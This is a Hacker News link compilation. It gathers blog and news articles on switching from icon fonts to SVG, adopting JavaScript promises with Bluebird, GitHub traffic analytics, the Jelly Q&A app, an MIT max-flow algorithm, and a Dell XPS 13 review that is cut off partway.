Channel: Hacker News 50

Ten reasons we switched from an icon font to SVG - Ian Feather


Comments:"Ten reasons we switched from an icon font to SVG - Ian Feather"

URL:http://ianfeather.co.uk/ten-reasons-we-switched-from-an-icon-font-to-svg/


We use a lot of icons on lonelyplanet.com and recently went through the task of transferring them from an icon font to SVG files. I wanted to share why we did this along with some of the current limitations to SVG and how we got around them.

1. Separation of concerns.

We use a custom font on lonelyplanet.com and we used to bundle the icons into the same file, storing the glyphs within the Private Unicode Area. This was great because it meant one less HTTP request to fetch the icons but we also felt that it limited our flexibility in how we prioritised resource loading.

We consider a small subset of our icons to be critical to the user's experience but we don’t think that way about our font or the other icons. We try to load non-critical assets after the page content and this was something we weren't able to do with the previous approach.

Breaking the critical icons out from the font and the rest of the icons allowed us to be more granular in how we delivered them to the user.

Counter argument

You don't have to bundle the font and the font icons together, you could serve two separate fonts. This is something we probably would have done had we stuck with the font-face solution.

2. Some devices don't honour the Private Unicode Area.

I'd heard rumours about devices overriding glyphs in the private unicode area and using them to serve emoji but I hadn't seen it happen until recently. Emoji was historically stored in the private unicode area, but at different ranges, so it would make sense that there could be conflicts.

I can't remember which device I was testing on but I saw one of our tick icons replaced with a multi-colour printer. The page looked amateurish and broken and certainly gave us impetus to make this transition.

3. Black squares and crosses on Opera Mini.

Font face support and detection is historically quite tricky to get right. I'm sure you've all seen this image of font awesome rendering on Opera Mini:

I won't go over the intricacies of this problem as Opera Mini support and many other platforms have been covered very well in this article by @kaelig.

I think what is really important though, beyond Opera Mini, is that this highlights a blind spot that we're not able to control. We physically aren't able to test on every device so it makes sense to favour techniques that are more likely to render consistently.

We don't get a huge amount of traffic from Opera Mini at the moment but we're a travel company serving people in all conditions on all bandwidths so we want to do better than that. With SVG and PNG we feel more confident that users won't get a broken and confusing page.

4. Chrome support for font-icons has been terrible recently.

Chrome Canary and Beta were hit with a fairly horrible font bug recently. If you haven't yet noticed the bug, fonts have been unloading and reverting to a system font after the page has experienced a period of inactivity.

When a font unloads and you're left with the text served as Georgia it can be a little annoying. The page is still very usable though. If the same font is responsible for serving the icons then suddenly the page is littered with black squares and looks broken.

This bug was introduced during our transition to SVG. It was a relief to cut over just as we were starting to get our first bug reports about it.

Counter argument

Those bugs haven't made it to a stable build of Chrome.

5. Crisper icons in Firefox.

We've found that our font renders at a slightly stronger weight in Firefox than in other browsers. This is OK for text (although not great) but for icons it can make the entire page look a bit unloved and clumsy. By using SVG we are able to normalise the look and feel of our icons cross browser.

6. You don't always have to use generated content.

If you want to use font-icons in css you need to declare them using the content property on generated content. Sometimes you might find yourself having to complicate your code to make this possible, e.g. because you are already using the :before and :after pseudo elements or because the element doesn't support generated content.

In that case you could choose to render it inline but you then end up with html entities scattered through your markup which can easily be lost or forgotten within a large application.

This problem is removed with SVG as you are not limited to generated content and can render them as a background image on any element.

7. Less fiddly to position.

Admittedly this may be a result of how we created and managed our icon glyphs but we always found them awkward to position exactly how we wanted (and in a consistent fashion cross browser). We resorted to line height hacks and absolute/relative positioning to get them just right and it was difficult to come up with an abstraction that worked consistently.

With SVG we've found the placement much more forgiving. We use background-size: cover and simply resize the element to ensure consistency across browsers.

8. Multi-colour icons.

Font icons are well known to have a single colour limitation. SVGs, on the other hand, can support multiple colours as well as gradients and other graphical features.

We have always had to support multi-colour icons for our maps and had previously used an additional PNG sprite alongside our icon font. As a result of the move to SVG we were able to delete this sprite which meant one less request for the user and one asset fewer to maintain.

Counter argument

Multi-colour font icons can be accomplished using icon layering.

It is significantly more challenging to do so successfully though: if positioning one glyph correctly cross-browser is tricky, it doesn't get easier with two.

9. SVGs allow us to use animation within our icons.

We haven't yet utilised this feature but it is likely something we will look into now that we have made the jump.

10. It's always felt like a hack.

Through a combination of all of the above, using font-face for icons has always felt like a hack. It is a brilliant hack, no doubt, but it's still a different asset type masquerading and being manipulated into something greater.

What about the benefits of font-face?

Serving icons through font-face does have some benefits over SVG and we had to consider these in depth before making the transition. The most pertinent benefits for font-face are browser support and colour flexibility.

It's fair to say that it would have been considerably harder to tackle these problems without the great work already done by the filamentgroup on Grunticon.

Colour variations

The huge benefit to using an icon font is its flexibility. There is no limit to the number of colour variations, and you can easily switch them depending on the current state (:hover, :focus, .is-active etc.). This is a rare luxury and very useful for quick development. It was also the reason we resisted making the leap to SVG for so long.

Our solution

There are a few solutions out there to provide this functionality although all of them have their own limitations (for now). We finally came up with a technique which we were pretty happy with and which struck a good balance between flexibility and resource size.

Grunticon is designed to declare each icon individually, thus avoiding having to use sprites. We followed suit with this approach but, although we had one css selector per icon, we served each icon in six different colours as shown here.

As we were just duplicating the same icon multiple times within the same file, it compressed down to the size of just one icon (plus around 50 bytes for gzip pointers). This meant that we could have n colour variations for each icon at almost no cost. Here's a jsFiddle showing how this technique works.

With this solution we regained the flexibility we thought we would miss. Although it takes away total flexibility, it also brought the added benefit of reinforcing colour palette consistency, something that had gradually been lost from our font icon implementation.

With this technique it is also easy to apply state-based changes to the icons by updating their background position.

It's worth mentioning that in the future we may be able to remove the sprite altogether and use SVG Fragment Identifiers to change the colour.

Browser support

Font icons work all the way back to IE8 whereas SVG does not. For our implementation we also required support for background-size although this is fairly comparable to SVG support.

Our solution

Grunticon handles legacy support right out of the box. It will create PNG versions of your SVG files and serve them to legacy browsers depending on whether or not they have support for SVG.
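As a rough illustration (not our actual build configuration, and option names vary between grunt-grunticon versions), pointing the task at a folder of SVGs looks something like this:

module.exports = function(grunt) {
  // Load the grunticon task (grunt-grunticon must be installed locally).
  grunt.loadNpmTasks('grunt-grunticon');

  grunt.initConfig({
    grunticon: {
      icons: {
        // Illustrative paths only.
        files: [{
          expand: true,
          cwd: 'src/icons',   // source SVG files
          src: ['*.svg'],
          dest: 'dist/icons'  // generated CSS, PNG fallbacks and preview page
        }]
      }
    }
  });

  grunt.registerTask('icons', ['grunticon']);
};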

We decided to serve just a subset of the icons (the critical ones, like the logo) to legacy browsers due to a lack of support for background-size. We could have avoided the need for this css property by resizing all the original SVG files but, as many of the icons are used at multiple sizes, we preferred to serve just the critical icons and keep them consistent within the sprite.

We also tried using this background-size polyfill but quickly abandoned it. I would definitely recommend avoiding this if you have more than one or two images you need to resize. We found that more than two caused IE8 to crash consistently.

Was it worth it?

Both techniques are resolution independent, scalable and fairly lightweight so if you are using either it is good for the user. We felt that on balance SVGs gave us more confidence in how our application would appear to each user and that extra element of control was ultimately what it came down to.

SVGs have been live on Lonely Planet since November 2013 and development has been painless so far.


Why I am switching to promises


Comments:"Why I am switching to promises"

URL:http://spion.github.io/posts/why-i-am-switching-to-promises.html


I'm switching my node code from callbacks to promises. The reasons aren't merely aesthetic; they're practical:

Throw-catch vs throw-crash

We're all human. We make mistakes, and then JavaScript throws an error. How do callbacks punish that mistake? They crash your process!

But spion, why don't you use domains?

Yes, I could do that. I could crash my process gracefully instead of letting it just crash. But it's still a crash no matter what lipstick you put on it. It still results in an inoperative worker. With thousands of requests, 0.5% hitting a throwing path means over 50 process shutdowns and most likely denial of service.

And guess what a user that hits an error does? Starts repeatedly refreshing the page, that's what. The horror!

Promises are throw-safe. If an error is thrown in one of the .then callbacks, only that single promise chain will die. I can also attach error or "finally" handlers to do any clean up if necessary - transparently! The process will happily continue to serve the rest of my users.
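As a small illustration (getUser, applySettings and respondWithError are hypothetical placeholders), a throw anywhere in the chain just rejects that chain and ends up in the error handler instead of taking down the worker:

getUser(id).then(function(user) {
  return JSON.parse(user.settings); // may throw on malformed JSON
}).then(function(settings) {
  applySettings(settings);
}).catch(function(err) {
  // rejections from getUser *and* the JSON.parse throw both land here;
  // the process keeps serving everyone else.
  respondWithError(err);
});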

For more info see #5114 and #5149. To find out how promises can solve this, see bluebird #51

if (err) return callback(err)

That line is haunting me in my dreams now. What happened to the DRY principle?

I understand that it's important to explicitly handle all errors. But I don't believe it's important to explicitly bubble them up the callback chain. If I don't deal with the error here, that's because I can't deal with the error there - I simply don't have enough context.

But spion, why don't you wrap your callbacks?

I guess I could do that and lose the callback stack when generating a new Error(). Or since I'm already wrapping things, why not wrap the entire thing with promises, rely on longStackSupport, and handle errors at my discretion?

Also, what happened to the DRY principle?

Promises are now part of ES6

Yes, they will become a part of the language. New DOM APIs will be using them too. jQuery already switched to promise...ish things. Angular utilizes promises everywhere (even in the templates). Ember uses promises. The list goes on.

Browser libraries already switched. I'm switching too.

Containing Zalgo

Your promise library prevents you from releasing Zalgo. You can't release Zalgo with promises. It's impossible for a promise to result in the release of the Zalgo-beast. Promises are Zalgo-safe (see section 3.1).

Callbacks getting called multiple times

Promises solve that too. Once the operation is complete and the promise is resolved (either with a result or with an error), it cannot be resolved again.
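A quick sketch of that guarantee, using the standard promise constructor (which Bluebird also provides): only the first resolution counts.

var p = new Promise(function(resolve, reject) {
  resolve("first");
  resolve("second");          // ignored - the promise is already resolved
  reject(new Error("nope"));  // also ignored
});
p.then(function(value) {
  console.log(value);         // logs "first", exactly once
});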

Promises can do your laundry

Oops, unfortunately, promises won't do that. You still need to do it manually.

But you said promises are slow!

Yes, I know I wrote that. But I was wrong. A month after I wrote the giant comparison of async patterns, Petka Antonov wrote Bluebird. It's a wickedly fast promise library, and here are the charts to prove it:

[Chart: time to complete (ms) vs. parallel requests]

[Chart: memory usage (MB) vs. parallel requests]

And now, a table containing many patterns, 10 000 parallel requests, 1 ms per I/O op. Measure ALL the things!

file                              time(ms)   memory(MB)
callbacks-original.js                  316        34.97
callbacks-flattened.js                 335        35.10
callbacks-catcher.js                   355        30.20
promises-bluebird-generator.js         364        41.89
dst-streamline.js                      441        46.91
callbacks-deferred-queue.js            455        38.10
callbacks-generator-suspend.js         466        45.20
promises-bluebird.js                   512        57.45
thunks-generator-gens.js               517        40.29
thunks-generator-co.js                 707        47.95
promises-compose-bluebird.js           710        73.11
callbacks-generator-genny.js           801        67.67
callbacks-async-waterfall.js           989        89.97
promises-bluebird-spawn.js            1227        66.98
promises-kew.js                       1578       105.14
dst-stratifiedjs-compiled.js          2341       148.24
rx.js                                 2369       266.59
promises-when.js                      7950       240.11
promises-q-generator.js              21828       702.93
promises-q.js                        28262       712.93
promises-compose-q.js                59413       778.05

Promises are not slow. At least, not anymore. In fact, bluebird generators are almost as fast as regular callback code (they're also the fastest generators as of now). And bluebird promises are definitely at least two times faster than async.waterfall.

Considering that bluebird wraps the underlying callback-based libraries and makes your own callbacks exception-safe, this is really amazing. async.waterfall doesn't do this: exceptions still crash your process.

What about stack traces?

Bluebird has them behind a flag that slows it down about 5 times. They're even longer than Q's longStackSupport: bluebird can give you the entire event chain. Simply enable the flag in development mode, and you're suddenly in debugging nirvana. It may even be viable to turn them on in production!
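Turning them on is a one-liner with Bluebird; a minimal sketch, gated so it only runs outside production:

var Promise = require('bluebird');
// Long stack traces cost roughly a 4-5x slowdown, so enable them only
// in development.
if (process.env.NODE_ENV !== 'production') {
  Promise.longStackTraces();
}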

But nobody will use my library if it's based on promises!

This is a valid point. Mikeal said it: if you write a library based on promises, nobody is going to use it.

However, both bluebird and Q give you promise.nodeify. With it, you can write a library with a dual API that can both take callbacks and return promises:

module.exports = function fetch(itemId, callback) {
 return locate(itemId).then(function(location) {
 return getFrom(location, itemId);
 }).nodeify(callback);
}

And now my library is not imposing promises on you. In fact, my library is even friendlier to the community: if I make a dumb mistake that causes an exception to be thrown in the library, the exception will be passed as an error to your callback instead of crashing your process. Now I don't have to fear the wrath of angry library users expecting zero downtime on their production servers. That's always a plus, right?

What about generators?

To use generators with callbacks you have two options:

1. use a resumer-style library like suspend or genny, or
2. wrap callback-taking functions to become thunk-returning functions.

Since #1 is proving to be unpopular, and #2 already involves wrapping, why not just s/thunk/promise/g in #2 and use generators with promises?
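For example, with Bluebird the wrapping boils down to something like the following sketch. Promise.coroutine wraps a generator function, and each yield suspends until the yielded promise settles; promisifyAll adds Async-suffixed, promise-returning versions of the fs methods. transformContent is a hypothetical async step, and the generator syntax needs a node build with generator support (0.11+ with --harmony at the time).

var Promise = require('bluebird');
var fs = Promise.promisifyAll(require('fs'));

var readTransformAndSave = Promise.coroutine(function* (inPath, outPath) {
  var content = yield fs.readFileAsync(inPath);
  var transformed = yield transformContent(content); // hypothetical async step
  yield fs.writeFileAsync(outPath, transformed);
});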

But promises are unnecessarily complicated!

Yes, the terminology used to explain promises can often be confusing. But promises themselves are pretty simple - they're basically like lightweight streams for single values.

Here is a straight-forward guide that uses known principles and analogies from node (remember, the focus is on simplicity, not correctness):

Edit (2014-01-07): I decided to re-do this tutorial into a series of short articles called promise nuggets. The content is CC0 so feel free to fork, modify, improve or send pull requests. The old tutorial will remain available within this article.

Promises are objects that have a then method. Unlike node functions, which take a single callback, the then method of a promise can take two callbacks: a success callback and an error callback. When one of these two callbacks returns a value or throws an exception, then must behave in a way that enables stream-like chaining and simplified error handling. Let's explain that behavior of then through examples:

Imagine that node's fs was wrapped to work in this manner. This is pretty easy to do - bluebird already lets you do something like that with promisify(). Then this code:

fs.readFile(file, function(err, res) {
 if (err) handleError();
 doStuffWith(res);
});

will look like this:

fs.readFile(file).then(function(res) {
 doStuffWith(res);
}, function(err) {
 handleError();
});

What's going on here? fs.readFile(file) starts a file reading operation. That operation is not yet complete at the point when readFile returns. This means we can't return the file content. But we can still return something: we can return the reading operation itself. And that operation is represented with a promise.

This is sort of like a single-value stream:

net.connect(port).on('data', function(res) { 
 doStuffWith(res); 
}).on('error', function(err) { 
 handleError(); 
});
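(As an aside, the promise-returning fs that these examples assume isn't magic. Here is a rough sketch of that wrapping using Bluebird's promisify, with names chosen to match the examples; it's only for illustration.)

// Bluebird's promisify turns a callback-taking function into one that
// returns a promise.
var Promise = require('bluebird');
var rawFs = require('fs');

var fs = {
  readFile: Promise.promisify(rawFs.readFile),
  writeFile: Promise.promisify(rawFs.writeFile)
};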

So far, this doesn't look that different from regular node callbacks - except that you use a second callback for the error (which isn't necessarily better). So when does it get better?

It's better because you can attach the callback later if you want. Remember, fs.readFile(file) returns a promise now, so you can put that in a var, or return it from a function:

var filePromise = fs.readFile(file);
// do more stuff... even nest inside another promise, then
filePromise.then(function(res) { ... });

Yup, the second callback is optional. We're going to see why later.

Okay, that's still not much of an improvement. How about this then? You can attach more than one callback to a promise if you like:

filePromise.then(function(res) { uploadData(url, res); });
filePromise.then(function(res) { saveLocal(url, res); });

Hey, this is beginning to look more and more like streams - they too can be piped to multiple destinations. But unlike streams, you can attach more callbacks and get the value even after the file reading operation completes.

Still not good enough?

What if I told you... that if you return something from inside a .then() callback, then you'll get a promise for that thing on the outside?

Say you want to get a line from a file. Well, you can get a promise for that line instead:


var filePromise = fs.readFile(file)
var linePromise = filePromise.then(function(data) {
 return data.toString().split('\n')[line];
});
var beginsWithHelloPromise = linePromise.then(function(line) {
 return /^hello/.test(line);
});

That's pretty cool, although not terribly useful - we could just put both sync operations in the first .then() callback and be done with it.

But guess what happens when you return a promise from within a .then callback. You get a promise for a promise outside of .then()? Nope, you just get the same promise!

function readProcessAndSave(inPath, outPath) {
  // read the file
  var filePromise = fs.readFile(inPath);
  // then send it to the transform service
  var transformedPromise = filePromise.then(function(content) {
    return service.transform(content);
  });
  // then save the transformed content
  var writeFilePromise = transformedPromise.then(function(transformed) {
    return fs.writeFile(outPath, transformed);
  });
  // return a promise that "succeeds" when the file is saved.
  return writeFilePromise;
}
readProcessAndSave(inPath, outPath).then(function() {
  console.log("Success!");
}, function(err) {
  // This function will catch *ALL* errors from the above
  // operations, including any exceptions thrown inside .then
  console.log("Oops, it failed.", err);
});

Now it's easier to understand chaining: at the end of every function passed to a .then() call, simply return a promise.

Let's make our code even shorter:

function readProcessAndSave(inPath, outPath) {
  return fs.readFile(inPath)
    .then(service.transform)
    .then(fs.writeFile.bind(fs, outPath));
}

Mind = blown! Notice how I don't have to manually propagate errors. They will automatically get passed with the returned promise.

What if we want to read, process, then upload, then also save locally?

function readUploadAndSave(file, url, otherPath) {
  var content;
  // read the file and transform it
  return fs.readFile(file)
    .then(service.transform)
    .then(function(vContent) {
      content = vContent;
      // then upload it
      return uploadData(url, content);
    }).then(function() { // after it's uploaded
      // save it
      return fs.writeFile(otherPath, content);
    });
}

Or just nest it if you prefer the closure.

function readUploadAndSave(file, url, otherPath) {
  // read the file and transform it
  return fs.readFile(file)
    .then(service.transform)
    .then(function(content) {
      return uploadData(url, content).then(function() {
        // after it's uploaded, save it
        return fs.writeFile(otherPath, content);
      });
    });
}

But hey, you can also upload and save in parallel!

function readUploadAndSave(file, url, otherPath) {
 // read the file and transform it
 return fs.readFile(file)
 .then(service.transform)
 .then(function(content) {
 // create a promise that is done when both the upload
 // and file write are done:
 return Promise.join(
 uploadData(url, content),
 fs.writeFile(otherPath, content));
 });
}

No, these are not "conveniently chosen" functions. Promise code really is that short in practice!

Similarly to how in a stream.pipe chain the last stream is returned, in promise pipes the promise returned from the last .then callback is returned.

That's all you need, really. The rest is just converting callback-taking functions to promise-returning functions and using the stuff above to do your control flow.

You can also return values in case of an error. So for example, to write a readFileOrDefault (which returns a default value if, for example, the file doesn't exist) you would simply return the default value from the error callback:

function readFileOrDefault(file, defaultContent) {
 return fs.readFile(file).then(function(fileContent) {
 return fileContent;
 }, function(err) {
 return defaultContent;
 });
}

You can also throw exceptions within both callbacks passed to .then. The user of the returned promise can catch those errors by passing an error callback to a subsequent .then.
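A tiny sketch of that (parseContent is a hypothetical next step): the throw below rejects the returned promise, and the error callback of the following .then picks it up.

fs.readFile(file).then(function(content) {
  if (!content.length) throw new Error("empty file");
  return content;
}).then(function(content) {
  return parseContent(content);
}, function(err) {
  // catches both read errors and the "empty file" throw above
  console.error("could not read:", err);
});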

Now how about configFromFileOrDefault that reads and parses a JSON config file, falls back to a default config if the file doesn't exist, but reports JSON parsing errors? Here it is:

function configFromFileOrDefault(file, defaultConfig) {
 // if fs.readFile fails, a default config is returned.
 // if JSON.parse throws, this promise propagates that.
 return fs.readFile(file).then(JSON.parse, 
 function ifReadFails() { 
 return defaultConfig; 
 });
 // if we want to catch JSON.parse errors, we need to chain another
 // .then here - this one only captures errors from fs.readFile(file)
}

Finally, you can make sure your resources are released in all cases, even when an error or exception happens:

var result = doSomethingAsync();
return result.then(function(value) {
 // clean up first, then return the value.
 return cleanUp().then(function() { return value; }) 
}, function(err) {
 // clean up, then re-throw that error
 return cleanUp().then(function() { throw err; });
})

Or you can do the same using .finally (from both Bluebird and Q):

var result = doSomethingAsync();
return result.finally(cleanUp);

The same promise is still returned, but only after cleanUp completes.

But what about async?

Since promises are actual values, most of the tools in async.js become unnecessary and you can just use whatever you're using for regular values, like your regular array.map / array.reduce functions, or just plain for loops. That, and a couple of promise array tools like .all, .spread and .some.

You already have async.waterfall and async.auto with .then and .spread chaining:

files.getLastTwoVersions(filename)
 .then(function(items) {
 // fetch versions in parallel
 var v1 = versions.get(items.last),
 v2 = versions.get(items.previous);
 return [v1, v2];
 })
 .spread(function(v1, v2) { 
 // both of these are now complete.
 return diffService.compare(v1.blob, v2.blob)
 })
 .then(function(diff) {
 // voila, diff is ready. Do something with it.
 });

async.parallel / async.map are straightforward:

// download all items, then get their names
var pNames = ids.map(function(id) { 
 return getItem(id).then(function(result) { 
 return result.name;
 });
});
// wait for things to complete:
Promise.all(pNames).then(function(names) {
 // we now have all the names.
});

What if you want to wait for the current item to download first (like async.mapSeries and async.series)? That's also pretty straightforward: just wait for the current download to complete, then start the next download, then extract the item name, and that's exactly what you say in the code:

// start with current being an "empty" already-fulfilled promise
var current = Promise.fulfilled();
var namePromises = ids.map(function(id) { 
 // wait for the current download to complete, then get the next
 // item, then extract its name.
 current = current
 .then(function() { return getItem(id); })
 .then(function(item) { return item.name; });
 return current;
}); 
Promise.all(namePromises).then(function(names) {
 // use all names here.
});

The only thing that remains is mapLimit - which is a bit harder to write - but still not that hard:

var queued = [], parallel = 3;
var namePromises = ids.map(function(id) {
 // How many items must download before fetching the next?
 // The queued, minus those running in parallel, plus one of 
 // the parallel slots.
 var mustComplete = Math.max(0, queued.length - parallel + 1);
 // when enough items are complete, queue another request for an item 
 return Promise.some(queued, mustComplete)
 .then(function() {
 var download = getItem(id);
 queued.push(download);
 return download; 
 }).then(function(item) {
 // after that new download completes, get the item's name. 
 return item.name;
 });
 });
Promise.all(namePromises).then(function(names) {
 // use all names here.
});

That covers most of async.
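And for completeness, an async.reduce-style sequential fold drops out of plain Array.prototype.reduce over a growing promise chain. A sketch (getItem is the same hypothetical helper as above; item.size is assumed purely for illustration):

// Fetch every item one after another and sum a numeric field.
function totalSize(ids) {
  return ids.reduce(function(prevPromise, id) {
    return prevPromise.then(function(total) {
      return getItem(id).then(function(item) {
        return total + item.size;
      });
    });
  }, Promise.fulfilled(0)); // start the chain with an already-fulfilled 0
}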

What about early returns?

Early returns are a pattern used throughout both sync and async code. Take this hypothetical sync example:

function getItem(key) {
 var item;
 // early-return if the item is in the cache.
 if (item = cache.get(key)) return item;
 // continue to get the item from the database. cache.put returns the item.
 item = cache.put(database.get(key));
 return item;
}

If we attempt to write this using promises, at first it looks impossible:

function getItem(key) {
 return cache.get(key).then(function(item) {
 // early-return if the item is in the cache.
 if (item) return item;
 return database.get(key)
 }).then(function(putOrItem) {
 // what do we do here to avoid the unnecessary cache.put ?
 })
}

How can we solve this?

We solve it by remembering that the callback variant looks like this:

function getItem(key, callback) {
 cache.get(key, function(err, res) {
 // early-return if the item is in the cache.
 if (res) return callback(null, res);
 // continue to get the item from the database
 database.get(key, function(err, res) {
 if (err) return callback(err);
 // cache.put calls back with the item
 cache.put(key, res, callback); 
 })
 })
}

The promise version can do pretty much the same - just nest the rest of the chain inside the first callback.

function getItem(key) {
 return cache.get(key).then(function(res) {
 // early return if the item is in the cache
 if (res) return res;
 // continue the chain within the callback.
 return database.get(key)
 .then(cache.put); 
 });
}

Or alternatively, if a cache miss results in an error:

function getItem(key) {
 return cache.get(key).catch(function(err) {
 return database.get(key).then(cache.put); 
 });
}

That means that early returns are just as easy as with callbacks, and sometimes even easier (in case of errors).

What about streams?

Promises can work very well with streams. Imagine a limit stream that allows at most 3 promises resolving in parallel, backpressuring otherwise, processing items from leveldb:

originalSublevel.createReadStream().pipe(limit(3, function(data) {
 return convertor(data.value).then(function(converted) {
 return {key: data.key, value: converted};
 });
})).pipe(convertedSublevel.createWriteStream());

Or how about stream pipelines that are safe from errors without attaching error handlers to all of them?

pipeline(original, limiter, converted).then(function(done) {
}, function(streamError) {
})

Looks awesome. I definitely want to explore that.

The future?

In ES7, promises will become monadic (by getting flatMap and unit). Also, we're going to get generic syntax sugar for monads. Then, it truly won't matter what style you use - stream, promise or thunk - as long as it also implements the monad functions. That is, except for callback-passing style - it won't be able to join the party because it doesn't produce values.

I'm just kidding, of course. I don't know if that's going to happen. Either way, promises are useful and practical and will remain useful and practical in the future.


Introducing GitHub Traffic Analytics · GitHub


Comments:"Introducing GitHub Traffic Analytics · GitHub"

URL:https://github.com/blog/1672-introducing-github-traffic-analytics


The holidays are over and we're getting back into the shipping spirit at GitHub. We want to kick off 2014 with a bang, so today we're happy to launch Traffic analytics!

You can now see detailed analytics data for repositories that you're an owner of or that you can push to. Just load up the graphs page for your particular repository and you'll see a new link to the traffic page.

When you land on the traffic page you'll see a lot of useful information about your repositories including where people are coming from and what they're viewing.

Looking at these numbers for our own repositories has been fun, sometimes surprising, and always interesting. We hope you enjoy it as much as we have!

Need help or found a bug? Contact us.

Jelly – Introducing Jelly


Comments:"Jelly – Introducing Jelly"

URL:http://blog.jelly.co/post/72563498393/introducing-jelly


Humanity is connected like never before. In fact, recent white papers have concluded that the proverbial “six degrees of separation” is now down to four because of social networking and mobile phones. It’s not hard to imagine that the true promise of a connected society is people helping each other.

Let’s Help Each Other

Using Jelly is kinda like using a conventional search engine in that you ask it stuff and it returns answers. But, that’s where the similarities end. Albert Einstein famously said, “Information is not knowledge.” Knowledge is the practical application of information from real human experience.

Jelly changes how we find answers because it uses pictures and people in our social networks. It turns out that getting answers from people is very different from retrieving information with algorithms. Also, it has the added benefit of being fun. Here are the three key features of Jelly.

Friends follow friends.

Jelly works with your existing social networks.

Jelly is designed to search the group mind of your social networks—and what goes around, comes around. You may find yourself answering questions as well as asking. You can help friends, or friends-of-friends with their questions and grow your collection of thank you cards. It feels good to help.

Paying it “Forward”

There is strength in weak ties.

My mom used to say, “It’s not what you know, it’s who you know.” Any question on Jelly can be forwarded outside the app—to anyone in the world. Maybe your friend, or even your friend’s friend doesn’t have the answer. However, your friend’s friend’s friend just might. It’s a small world after all.

Point, shoot, ask!

Questions with images deepen their context.

In a world where 140 characters is considered a maximum length, a picture really is worth a thousand words. Images are in the foreground of the Jelly experience because they add depth and context to any question. You can crop, reframe, zoom, and draw on your images to get more specific.

How Does Jelly Work?

Say you’re walking along and you spot something unusual. You want to know what it is so you launch Jelly, take a picture, circle it with your finger, and type, “What’s this?” That query is submitted to some people in your network who also have Jelly. Jelly notifies you when you have answers. (See video.)

No matter how sophisticated our algorithms become, they are still no match for the experience, inventiveness, and creativity of the human mind. Jelly is a new way to search and something more–it makes helping other people easy and fun. We hope you find Jelly as useful and rewarding as we do.

New algorithm can dramatically streamline solutions to the ‘max flow’ problem - MIT News Office


Comments:"New algorithm can dramatically streamline solutions to the ‘max flow’ problem - MIT News Office"

URL:http://web.mit.edu/newsoffice/2013/new-algorithm-can-dramatically-streamline-solutions-to-the-max-flow-problem-0107.html


Finding the most efficient way to transport items across a network like the U.S. highway system or the Internet is a problem that has taxed mathematicians and computer scientists for decades.

To tackle the problem, researchers have traditionally used a maximum-flow algorithm, also known as “max flow,” in which a network is represented as a graph with a series of nodes, known as vertices, and connecting lines between them, called edges.

Given that each edge has a maximum capacity — just like the roads or the fiber-optic cables used to transmit information around the Internet — such algorithms attempt to find the most efficient way to send goods from one node in the graph to another, without exceeding these constraints.

But as the size of networks like the Internet has grown exponentially, it is often prohibitively time-consuming to solve these problems using traditional computing techniques, according to Jonathan Kelner, an associate professor of applied mathematics at MIT and a member of MIT’s Computer Science and Artificial Intelligence Laboratory (CSAIL).

So in a paper to be presented at the ACM-SIAM Symposium on Discrete Algorithms in Portland, Ore., this week, Kelner and his colleague Lorenzo Orecchia, an applied mathematics instructor, alongside graduate students Yin Tat Lee and Aaron Sidford, will describe a new theoretical algorithm that can dramatically reduce the number of operations needed to solve the max-flow problem, making it possible to tackle even huge networks like the Internet or the human genome.

“There has recently been an explosion in the sizes of graphs being studied,” Kelner says. “For example, if you wanted to route traffic on the Internet, study all the connections on Facebook, or analyze genomic data, you could easily end up with graphs with millions, billions or even trillions of edges.”

Previous max-flow algorithms have come at the problem one edge, or path, at a time, Kelner says. So for example, when sending items from node A to node B, the algorithms would transmit some of the goods down one path, until they reached its maximum capacity, and then begin sending some down the next path.

“Many previous algorithms,” Kelner says, “would find a path from point A to point B, send some flow along it, and then say, ‘Given what I’ve already done, can I find another path along which I can send more?’ When one needs to send flow simultaneously along many different paths, this leads to an intrinsic limitation on the speed of the algorithm.”

But in 2011 Kelner, CSAIL graduate student Aleksander Madry, mathematics undergraduate Paul Christiano, and colleagues at Yale University and the University of Southern California developed a technique to analyze all of the paths simultaneously.

The researchers viewed the graph as a collection of electrical resistors, and then imagined connecting a battery to node A and a ground to node B, and allowing the current to flow through the network. “Electrical current doesn’t pick just one path, it will send a little bit of current over every resistor on the network,” Kelner says. “So it probes the whole graph globally, studying many paths at the same time.”

This allowed the new algorithm to solve the max-flow problem substantially faster than previous attempts.

Now the MIT team has developed a technique to reduce the running time even further, making it possible to analyze even gigantic networks, Kelner says.

Unlike previous algorithms, which have viewed all the paths within a graph as equals, the new technique identifies those routes that create a bottleneck within the network. The team’s algorithm divides each graph into clusters of well-connected nodes, and the paths between them that create bottlenecks, Kelner says.

“Our algorithm figures out which parts of the graph can easily route what they need to, and which parts are the bottlenecks. This allows you to focus on the problem areas and the high-level structure, instead of spending a lot of time making unimportant decisions, which means you can use your time a lot more efficiently,” he says.

The result is an almost linear algorithm, Kelner says, meaning the amount of time it takes to solve a problem is very close to being directly proportional to the number of nodes on the network. So if the number of nodes on the graph is multiplied by 10, the amount of time would be multiplied by something very close to 10, as opposed to being multiplied by 100 or 1,000, he says. “This means that it scales essentially as well as you could hope for with the size of the input,” he says.

Shanghua Teng, a professor of computer science at the University of Southern California who was not involved in the latest paper, says it represents a major breakthrough in graph algorithms and optimization software.

“This paper, which is the winner of the best paper award at the [ACM-SIAM] conference, is a result of sustained efforts by Kelner and his colleagues in applying electrical flows to design efficient graph algorithms,” Teng says. “The paper contains an amazing array of technical contributions.”



Jx0.org: Dell XPS 13 Developer Edition review (Haswell, late 2013 model)


Comments:"Jx0.org: Dell XPS 13 Developer Edition review (Haswell, late 2013 model)"

URL:http://www.jx0.org/2013/12/dell-xps-13-developer-edition-review.html


The XPS 13 Developer Edition, aka "Project Sputnik", is a laptop with a FullHD 13-inch screen, backlit keyboard, SSD, 4th gen intel CPU and comes pre-installed with Ubuntu 12.04 LTS. What makes this machine so interesting is not so much that Ubuntu comes pre-installed on it (it would be easy for anybody to install it him/herself, after all), but rather that Dell put some extra-work in making sure everything works right out of the box and supports running Ubuntu on it. WiFi, keyboard backlight, screen brightness control, sleepmode, etc. are guaranteed to work. Additionally, you save a few bucks on the Windows license.
I had been interested in this machine before and since it was updated with the new Intel Haswell processors in November (official announcement by the project lead), I jumped on it (The alternative I thought about was the System76 Galago Ultrapro).

I placed my order on December 6th. Dell had a special promotion that day (and maybe also a pricing error? Not sure). The laptop was $ 1469 (instead of the usual $ 1549) and there was a $ 50 coupon on their website, bringing the whole thing down to $ 1419 before tax, including 3-day shipping. The estimated delivery date was January 16th at the time I placed my order (It seems they were having some supply issues).
However, on December 19th, I received a shipping notification and I had the package in my hands 2 days later.

The hardware specs:

CPU: Intel i7-4500U (dual core, 1.8 GHz, up to 3 GHz with TurboBoost, 4 MB cache)
